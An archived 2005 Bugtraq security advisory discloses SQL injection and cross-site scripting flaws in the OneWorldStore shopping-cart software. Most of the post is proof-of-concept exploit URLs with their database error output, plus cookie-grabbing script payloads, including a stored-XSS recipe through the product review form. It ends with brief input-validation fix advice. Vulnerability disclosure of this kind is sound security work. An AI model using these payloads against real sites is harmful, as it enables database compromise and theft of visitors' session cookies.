[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple multiple sql injection/errors and xss vulnerabilities in
From:       dcrab <dcrab () hackerscenter ! com>
Date:       2005-04-14 18:31:17
Message-ID: 20050414183117.2562.qmail () www ! securityfocus ! com
[Download RAW message or body]



Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple multiple sql injection/errors and xss vulnerabilities in \
                OneWorldStore
Date: 14/04/2005

Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: There are, multiple sql injection/errors and xss vulnerabilities in \
oneworldstore.


Proof of Concept Exploits: 

http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owBasket/owAddItem.asp, line 48


http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owListProduct.asp, line 50


http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owListProduct.asp, line 50


http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owProductDetail.asp, line 647


http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
 SQL INJECTION
ODBC driver does not support the requested properties.

SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/owProductDetail.asp, line 647


http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
 Pops Cookie


http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C \
/script%3E&idCategory=64http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
 Pops Cookie


http://example.com/owProductDetail.asp
Submitting the review form, with someething like
Name:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
 Rating:5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Would cause long lasting permanent XSS and steal the cookies of anyone who visited \
the webpage.


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding \
with php.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic